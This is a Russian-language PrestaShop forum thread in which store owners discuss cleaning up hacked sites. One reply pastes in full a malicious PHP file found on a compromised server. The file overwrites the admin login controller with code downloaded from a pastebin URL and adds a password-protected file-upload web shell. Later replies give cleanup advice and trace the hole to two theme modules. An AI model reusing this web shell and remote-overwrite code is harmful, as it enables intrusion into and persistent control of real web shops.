Автор Тема: Взлом prestashop  (Прочитано 4246 раз)

13 Октябрь 2016, 14:04:13
Ответ #60
  • Ветеран
  • *****
  • Сообщений: 14169
  • Репутация: +14571/-2
  • Сообщество PrestaShop
    • Просмотр профиля
Не знаю, но это можно посмотреть на их сайте. Тем кто купил тему они рассылали письма с описанием версии и устранненых проблем, также с ссылкой на обновление.
13 Октябрь 2016, 16:17:58
Ответ #61
  • Новичок
  • *
  • Сообщений: 20
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
    • HDTV Zone
...
liston, стяните файлы сайта по ФТП или с админки Хостера и ищите новые или измененные файлы.
Особенно внимательно ищите среди файлов рhр
23 Июнь 2017, 14:55:18
Ответ #62
  • Фрилансер
  • *
  • Сообщений: 145
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Приветствую!
нашелся такой файл 2d_is.php в модуле shopgate
это относится , к - is.php ( при взломе)?
23 Июнь 2017, 15:12:47
Ответ #63
  • Ветеран
  • *****
  • Сообщений: 14169
  • Репутация: +14571/-2
  • Сообщество PrestaShop
    • Просмотр профиля
Код в файле какой?
13 Сентябрь 2017, 16:39:58
Ответ #64
  • Пользователь
  • **
  • Сообщений: 99
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Здравствуйте, не могу никак удалить вредоносный код. Чищу, но при этом он снова появляется. Появляется файл up.php в корне сайта и в папке модулей.

На данный момент сайт работает. Я поменял права файла AdminLoginController.php только на чтение. Изменил все пароли. Но этот файл упорно продолжает появляться.
В сети информацию не нашел.
Вот содержимое этого файла.
<?php
echo "hacked by bajatax <br>";
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach(
$sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach(
$p1 as $path){
if (
file_exists("$path"))
{
$html = @file_get_contents('https://pastebin.com/raw/1SMJWSTB');
$save=fopen($path,'w');
fwrite($save,$html);
echo 
"<br> ./done panel <br>";
}}}
if(
$_GET['bajatax']=="hous"){
echo 
'<center><font color="Red" size="4">';
echo 
" Files Upload BY Bajatax<br>";
/// Script Upload By bajatax \\\
if(isset($_POST['Submit']) && isset($_POST['pass'])){
$pass=md5($_POST['pass']);
if(
$pass=="4cdc6e86fd083752251903f4400d5257"){
$filedir ""
$maxfile '2000000';
$mode '0644';
$userfile_name $_FILES['image']['name'];
$userfile_tmp $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp$qx);
@chmod ($qxoctdec($mode));
echo
" <a href=$userfile_name><center><b>Sucess Upload by Bajatax  :D ==> $userfile_name</b></center></a>";
}
}
else{
echo 
"ikma khask pass hhh :v doz inbox www.fb.com/bajatax58 :p jib BTC o duz Khod u_f  :p <br>";
}}
else{
echo
'<form method="POST" action="#" enctype="multipart/form-data"><br>upload :  <input type="file" name="image"><br>  pass : <input type="password" name="pass" value="9lawi la3rftih :v "><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo 
"<br> hadi fkhatr ga3 l3chran houus :D <br>";
echo 
'</center></font>';

}
?>
13 Сентябрь 2017, 17:16:08
Ответ #65
  • Ветеран
  • *****
  • Сообщений: 33082
  • Репутация: +26762/-0
    • Просмотр профиля
AdminLoginController.php не причем. У вас на сайте внедрен shell скрипт, который дает возможность менять файлы.
14 Сентябрь 2017, 07:37:17
Ответ #66
  • Пользователь
  • **
  • Сообщений: 99
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Зная код этого файла можно как-то найти этот shell ? Это крипт автоматически создает этот файл? Или кто-то удаленно заливает?
14 Сентябрь 2017, 10:49:13
Ответ #67
  • Ветеран
  • *****
  • Сообщений: 33082
  • Репутация: +26762/-0
    • Просмотр профиля
Этот код в поиске не поможет. Нужно сравнивать файлы по весу, времени и по коды, брать оригинальные файлы prestashop и сравнивать со своими.
Скрипт заливается автоматом. У вас уже внедрен шел в каком-то из файлов и через него происходит заливка.
14 Сентябрь 2017, 11:21:05
Ответ #68
  • Фрилансер
  • *
  • Сообщений: 131
  • Репутация: +1/-1
  • Сообщество PrestaShop
    • Просмотр профиля
    • Электронный учет коммерческой деятельности
https://revisium.com/ai/


должно помочь найти шелл и дырку.
14 Сентябрь 2017, 11:31:23
Ответ #69
  • Ветеран
  • *****
  • Сообщений: 3070
  • Репутация: +72/-5
  • Сообщество PrestaShop
    • Просмотр профиля
https://revisium.com/ai/
должно помочь найти шелл и дырку.
На шаредхостнге бесполезный.
Сайт падает постояно, как только время работы превышает.
Скачал на локальный,  проверил сайт, ругается даже на чистые сайты, нашел несколько вирусов, я их поудалял.
Залил на хостинг и через пару недель опять таже картина.
14 Сентябрь 2017, 11:57:52
Ответ #70
  • Пользователь
  • **
  • Сообщений: 78
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Так может это не у вас вирусы. Очень часто взламывают один сайт, а вирус распространяют на многие. Что за хостинг?
26 Сентябрь 2017, 07:36:30
Ответ #71
  • Пользователь
  • **
  • Сообщений: 99
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Нашел суть проблемы. Дыры оказались в модулях темы. После обновления файлов темы - это помогло.
https://support.promokit.eu/index.php?do=details&task_id=10310
Модули
pk_flexmenu и pk_vertflexmenu